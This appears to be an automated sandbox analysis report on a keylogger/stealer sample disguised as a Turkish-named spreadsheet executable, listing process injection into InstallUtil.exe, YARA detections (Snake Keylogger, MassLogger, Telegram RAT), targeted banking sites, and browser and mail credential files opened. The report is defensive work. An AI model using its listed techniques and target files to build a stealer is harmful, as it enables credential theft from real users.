                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000004.00000002.4492707739.0000000000B96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllultu
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: InstallUtil.exe, 00000002.00000002.4492554655.0000000000E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWP
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: InstallUtil.exe, 00000004.00000002.4509605645.0000000003DC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000003E35000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: InstallUtil.exe, 00000007.00000002.4508776850.0000000004154000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeCode function: 0_2_05B13134 rdtsc 0_2_05B13134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06449548 LdrInitializeThunk,LdrInitializeThunk,2_2_06449548
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    .NET source code references suspicious native API functions
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9E5008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 95D008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D44008Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Users\user\AppData\Roaming\Tojeiuai.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Users\user\AppData\Roaming\Tojeiuai.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected MassLogger RAT
                    Source: Yara matchFile source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4490634067.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3228, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3772, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4490630405.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 6544, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Tojeiuai.exe PID: 7104, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5480, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438e6a0.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Tojeiuai.exe.43e7d70.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2251979049.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2164548814.0000000003796000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
